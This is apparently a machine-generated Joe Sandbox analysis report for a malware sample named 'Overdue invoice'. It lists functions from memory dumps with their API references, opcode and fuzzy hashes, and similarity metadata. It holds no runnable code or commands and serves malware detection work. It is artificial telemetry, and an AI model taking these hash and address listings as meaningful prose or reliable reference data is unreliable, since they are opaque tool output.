                                                                          • Instruction ID: ccd4b0b382b2b2ea116b7bedcbe312a099cc4f123b964947b640ba3c7065f257
                                                                          • Opcode Fuzzy Hash: 5cd360c3bce1bb0dc5c95d8ce7e924bfe1544a8479b9f85b9e7499160d5d9761
                                                                          • Instruction Fuzzy Hash: 8441FC35902268CFDB65DF20D8886ADB7B2FF4630AF6041EAE50A97340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7F33 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 333fc2e8e0211efd01589cefd1fdcffddc8bbd7c371d7a7fdda0522b73c53e0e
                                                                          • Instruction ID: e1a68709bfc232a2a8e43fb638c942a2c0e46488aeffe01382254b8ca6ee05bb
                                                                          • Opcode Fuzzy Hash: 333fc2e8e0211efd01589cefd1fdcffddc8bbd7c371d7a7fdda0522b73c53e0e
                                                                          • Instruction Fuzzy Hash: A0310C35902268CFCB65DF20D8886A9B7B2FF4630AF6041EAE50A97340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7F7D Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 234c649fa44cb84f6c6b1e5ce9b1b0a98d6bd5dac75ed0732245b49c9f108ded
                                                                          • Instruction ID: e146ef70d16429f3620fd18e76766a80daa3c027af488be7e8c8cb1bdd9b41b8
                                                                          • Opcode Fuzzy Hash: 234c649fa44cb84f6c6b1e5ce9b1b0a98d6bd5dac75ed0732245b49c9f108ded
                                                                          • Instruction Fuzzy Hash: A531DD35A02268CFDB65DF60D8886ADB7B2FF4630AF6041DAD50A97340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E57BC Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 064E64A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 3559d961d238a44392d25fa9e3ef5173ee60b899723193cebea640dbea1fca06
                                                                          • Instruction ID: 02f938e0ee5dc8c6a7e0c6e1c64a4bfb7aa7731ea7df7c17b901899a29944c3e
                                                                          • Opcode Fuzzy Hash: 3559d961d238a44392d25fa9e3ef5173ee60b899723193cebea640dbea1fca06
                                                                          • Instruction Fuzzy Hash: 932144B1C006599BCB10CF9AC544BAEFBB4AF48224F15826AE818B7740D738A944CFE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016D4CDB Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 016D4D62
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.521039244.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_16d0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: f2ba848023eabfd08b12d8371473c1bd515c655031b16631cc91373507cac212
                                                                          • Instruction ID: 9338466132dd01d094c16f27e26cf2d9d06fc683f2e74c0fa662c5fc44dd93c3
                                                                          • Opcode Fuzzy Hash: f2ba848023eabfd08b12d8371473c1bd515c655031b16631cc91373507cac212
                                                                          • Instruction Fuzzy Hash: F821DE72C003458FDB20EFA9C84879EBBF8EB48728F10802AD405A3601C7389809CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7FC7 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: a74028127b7a839396647fffc92754427b3aa53f5856dc3b7698d455f7f32ed7
                                                                          • Instruction ID: 4d72e11a946c94cddf527f537ec58e346f6a383c4b48c2f8cb86b7f304c0a844
                                                                          • Opcode Fuzzy Hash: a74028127b7a839396647fffc92754427b3aa53f5856dc3b7698d455f7f32ed7
                                                                          • Instruction Fuzzy Hash: DA210A35A02268CFCB65DF60D8886A9B7B2FF4630AF6041EAE50AA7340DF315D81CF41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016D4CE8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 016D4D62
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.521039244.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_16d0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: cd231ad74cf4b3dfb496afc7c2009d7223abd8ae125fc56050b7a483b161e59c
                                                                          • Instruction ID: 2fbf2dbf7ed68bfef1cf31a5f7fa685559cb3b1194d62b51f0b59bbd56929e77
                                                                          • Opcode Fuzzy Hash: cd231ad74cf4b3dfb496afc7c2009d7223abd8ae125fc56050b7a483b161e59c
                                                                          • Instruction Fuzzy Hash: 5211AC71D003498FDB50EFA9C84879EBBF4EB45724F10842AD405A3B41CB38A849CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E8011 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: c0bb1d703c25ab6979435c57a77dca7b8b729e88f168d53f81f9dafc25003ff3
                                                                          • Instruction ID: 0d7e334518191cfeb80111381547a4cf661f4ff417cb80f8f67b05bc9c4b5c09
                                                                          • Opcode Fuzzy Hash: c0bb1d703c25ab6979435c57a77dca7b8b729e88f168d53f81f9dafc25003ff3
                                                                          • Instruction Fuzzy Hash: F521DB35A02268CFCB65DF60D8886ADB7B6FF46306F5041EAE54AA7340DB315D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E805B Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: d57fe4f17d7b58d04e40880c1806546dc303c228046d4abc2c29080d3229d627
                                                                          • Instruction ID: 5b8b828c55309c171905ba6c5f04d1973db56dad1ed3955a1599880bf7b5bde6
                                                                          • Opcode Fuzzy Hash: d57fe4f17d7b58d04e40880c1806546dc303c228046d4abc2c29080d3229d627
                                                                          • Instruction Fuzzy Hash: DA113C35A01268CFCB65EF60E8886ADB7B6FF4A306F5001EAE54A97250DF315D81CF41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E8099 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: fdfad05f62bcfdaf354f5a011c4f5ee2d518e34340d78ea52eb81df2c0d58c29
                                                                          • Instruction ID: cbe21705306fb569f1c70d4bfbc2b450fb18a3fa736914b5ed6b3c3033c90dba
                                                                          • Opcode Fuzzy Hash: fdfad05f62bcfdaf354f5a011c4f5ee2d518e34340d78ea52eb81df2c0d58c29
                                                                          • Instruction Fuzzy Hash: F601E935E01268CFCB64DF60E8886ADB7B5FF46306F1041EAE50AA7240DB305E81CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E80E3 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 76657c47624b2c5889382c4a189b4b570f4852006f506c7264fc9f9ebc67a541
                                                                          • Instruction ID: 995bd46eb579f5980c3f0f891eb51b3f0d6d84bda5fc1aa3d3b4f72c71618cd9
                                                                          • Opcode Fuzzy Hash: 76657c47624b2c5889382c4a189b4b570f4852006f506c7264fc9f9ebc67a541
                                                                          • Instruction Fuzzy Hash: 24F0B635E01268CFCB649F64E888699B7B5FF45315F1041EAE50AA3250DB305E81CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E812D Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: f33e26e824bb0c57d907135985b9c90ab16e317010d36bfddbe076db9fa142c6
                                                                          • Instruction ID: 0548b4305e62058f68f70d0cfc19ead63daf4608daa8fc7994a310416069b236
                                                                          • Opcode Fuzzy Hash: f33e26e824bb0c57d907135985b9c90ab16e317010d36bfddbe076db9fa142c6
                                                                          • Instruction Fuzzy Hash: F6F09235A01228CFCB64AF64E8896D9B7B5FB45706F1141EAE60AA3244DB306E818F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C65B28 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: P@Jm
                                                                          • API String ID: 0-2739332884
                                                                          • Opcode ID: 7bd8a0832516c625bbfffa6098d6093b0b19ff8db1c48e506ea79840f4c9651a
                                                                          • Instruction ID: b2d477811038058441421b6079bf89ce299325839de37364004cec962aec2745
                                                                          • Opcode Fuzzy Hash: 7bd8a0832516c625bbfffa6098d6093b0b19ff8db1c48e506ea79840f4c9651a
                                                                          • Instruction Fuzzy Hash: 0031E631B00204AFCB54AB76C854AAEBBF6EF8D240B65892DE406DB344DF359D01CBE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C65B38 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: P@Jm
                                                                          • API String ID: 0-2739332884
                                                                          • Opcode ID: 253e233597f3bbda409353a6ed6d72b09ea22f4f837c8b0f96d8cb3af9da6547
                                                                          • Instruction ID: 2bf44470db2c5da99797b2e7411c88ed709395a2fbf082822b16ae6cd414c89b
                                                                          • Opcode Fuzzy Hash: 253e233597f3bbda409353a6ed6d72b09ea22f4f837c8b0f96d8cb3af9da6547
                                                                          • Instruction Fuzzy Hash: 0D31C231B042049FCB54AB75C8546AEB7E7AF8D240B65892DE406EB384DF309D01CBE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A0B8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: 4bde62572d8dbf345a7eabe8b1c82eb0eefa3e7343fb1e25a0ef635af6e122e0
                                                                          • Instruction ID: 54c3089d28690fa679a8c4d8755ac4a3befe20dfe8748f66ca0ab707b1a05472
                                                                          • Opcode Fuzzy Hash: 4bde62572d8dbf345a7eabe8b1c82eb0eefa3e7343fb1e25a0ef635af6e122e0
                                                                          • Instruction Fuzzy Hash: CC21C171B001059FDF98DBAA8D80BBFB6AAAFC4604F10852DE519E7280EF74D94187E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A050 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: d93e545a3295031a53b53ac8279e3beca6fc5bc99357b64f095e5f55ac7204a8
                                                                          • Instruction ID: e6b027e03fb34087ee7fef8def06f73123335b95391e4b5ff5f089d806a986d9
                                                                          • Opcode Fuzzy Hash: d93e545a3295031a53b53ac8279e3beca6fc5bc99357b64f095e5f55ac7204a8
                                                                          • Instruction Fuzzy Hash: 85213132A042449FDB46DBAA8C906BF77B1AF82204F11816EE515EB1C1EB749D4483E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A0B3 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: e28637b897acaa968219f8a4af7c1e4f78ffe8e7fc0a28984877d5054f2ea519
                                                                          • Instruction ID: 5c80a0f4e16160fb6fd9e3bdea4f539b7f90f2ab02ec7531529c804602bfe6ee
                                                                          • Opcode Fuzzy Hash: e28637b897acaa968219f8a4af7c1e4f78ffe8e7fc0a28984877d5054f2ea519
                                                                          • Instruction Fuzzy Hash: 6E21C571E00105AEDB54DBEA8D81BBFB6F9EBC4604F10812EE519E7280EFB4D94187E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A1BF Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: 925d409d0070807effe88d81ddc91e5d6f85dd5c380e69ece7027fe504f36343
                                                                          • Instruction ID: 53bdeb9db969ba4b100bd4d3c0726415464eaefc80f41d6c7f6e7b5be7ca4a10
                                                                          • Opcode Fuzzy Hash: 925d409d0070807effe88d81ddc91e5d6f85dd5c380e69ece7027fe504f36343
                                                                          • Instruction Fuzzy Hash: 88217171F002108BDB649FBAD88476E76A6AB88314F24853DE519EB384DB75DC42CBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C64EB0 Relevance: .6, Instructions: 581COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e2310dae78eb368a31ab5f71823ed73a62630958a6707435bacd1aa6be80a12a
                                                                          • Instruction ID: 0ec2a7943fa9535c2c425dfff9fc9bc163b50bd31ecd8f99a71db49feb61b24d
                                                                          • Opcode Fuzzy Hash: e2310dae78eb368a31ab5f71823ed73a62630958a6707435bacd1aa6be80a12a
                                                                          • Instruction Fuzzy Hash: 8E22B134E002089FCB50EFB5D9986AEBBB6EF89304F608969E405DB364DB34DD41CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C67668 Relevance: .4, Instructions: 371COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c6c7ac06a6264cda5111ead7b0046e58bd18f36ea2d0ed2dfbdbf15f0d28e2b5
                                                                          • Instruction ID: 4acecea6f0ad2cda8a037d99aecc2ae9f9ef0acf075847e7c44b508fbd279792
                                                                          • Opcode Fuzzy Hash: c6c7ac06a6264cda5111ead7b0046e58bd18f36ea2d0ed2dfbdbf15f0d28e2b5
                                                                          • Instruction Fuzzy Hash: EDC1F531F042058FCB55DB6AC894ABEB7F6EF85308F14886EE016DB251DA38DE41C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6DD58 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e298d35c13bc5419fc57dc38912745006df047b22d5089b26571073ef004c2d
                                                                          • Instruction ID: a16e1364c0b8cf01b03a0abef6c55b1ae5feb761f63a25157f42a7f4650e4c61
                                                                          • Opcode Fuzzy Hash: 7e298d35c13bc5419fc57dc38912745006df047b22d5089b26571073ef004c2d
                                                                          • Instruction Fuzzy Hash: 69B11935B042058FCF94DB6AC8C43ADB7B2EF85324F18856AE516DB381C635E941CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A430 Relevance: .3, Instructions: 278COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 43c1a58263e511d7e4de1e3684e0fe28d8fb037686c9a20bdee1420b857fea5e
                                                                          • Instruction ID: 27e5aaef4a9c79dbe49c778e1ddc5a32937be120d7442572206a296786c46c7f
                                                                          • Opcode Fuzzy Hash: 43c1a58263e511d7e4de1e3684e0fe28d8fb037686c9a20bdee1420b857fea5e
                                                                          • Instruction Fuzzy Hash: 02A16D34B042049FDB40ABB1D998B6DB7B6AB84725F258628F5129B3D9DF71EC01CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C69158 Relevance: .2, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b19ae3660a0c85a119266f0623ad8ccbf6c0037abc237a353f46cf6aa3639d2
                                                                          • Instruction ID: 198fef5080ab8fb75aaac94182791d1603e50bcce16c9696ec947c309bf92356
                                                                          • Opcode Fuzzy Hash: 4b19ae3660a0c85a119266f0623ad8ccbf6c0037abc237a353f46cf6aa3639d2
                                                                          • Instruction Fuzzy Hash: 5A51A131B042158FCB44EBB9D4946ADB7F6EF89318B218938E506EB394DF31AC41CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C69828 Relevance: .2, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 869785283b2651b6f4fd89068079ec68de58b3969ad5c1157255713661b1f0b0
                                                                          • Instruction ID: 8e0c263eb37d98b9aef44c000f9ecc63036e80a755d89ff987bd64514060d5c1
                                                                          • Opcode Fuzzy Hash: 869785283b2651b6f4fd89068079ec68de58b3969ad5c1157255713661b1f0b0
                                                                          • Instruction Fuzzy Hash: A8617D74E11218CFCB54EFB1D898A9DBBB6BF49301F508469E90AA7344DB34A941CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C67CE8 Relevance: .1, Instructions: 142COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6794ff7aa1a6ab09245615e1d3e55d8416d2d40aaf1fa7bb0b7e885bba913f8
                                                                          • Instruction ID: 7ccbe797bd9ec6bfe8c36da0b99127fabf2e3734a823050100fab8b3d9ce7259
                                                                          • Opcode Fuzzy Hash: d6794ff7aa1a6ab09245615e1d3e55d8416d2d40aaf1fa7bb0b7e885bba913f8
                                                                          • Instruction Fuzzy Hash: 8341D430B002158FDB65EB75D89026EB7A7EBC4344F158829E906DB384CF38AD018BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A9E8 Relevance: .1, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0654031155254780edc9336c355c73dc88fd2f70df99f0ef577efd7c53b334fc
                                                                          • Instruction ID: d6bd10c081e93fbb0cfa6f0c00ab695c2b710201388eda6f1b0457071ad388e4
                                                                          • Opcode Fuzzy Hash: 0654031155254780edc9336c355c73dc88fd2f70df99f0ef577efd7c53b334fc
                                                                          • Instruction Fuzzy Hash: BD41D330E043448ADB628F6AC48435DBBA3EFC7304F28C5AEE4099F28AD776C545C769
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68E0B Relevance: .1, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 31c32eeeed2f511f431254eb2718760b0f148d4d3df40371b97480abc1e76e22
                                                                          • Instruction ID: b433e3e874920115232c0e925b10e617644690a1c8487585737bbd2c695d3a1d
                                                                          • Opcode Fuzzy Hash: 31c32eeeed2f511f431254eb2718760b0f148d4d3df40371b97480abc1e76e22
                                                                          • Instruction Fuzzy Hash: 7F411B34F053404FDB82D7BA9C5466E7BF2AFC6600B4584A6E508DB392DA38DC06C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6DE03 Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55357e1124c1b4d279fdb4267d8e218c0979ca47e646a9ec2f34962985505bb7
                                                                          • Instruction ID: 26cdc78db9002b01ce1cd441b629d33f0d14cbf068b30b72106a7c03a855bbce
                                                                          • Opcode Fuzzy Hash: 55357e1124c1b4d279fdb4267d8e218c0979ca47e646a9ec2f34962985505bb7
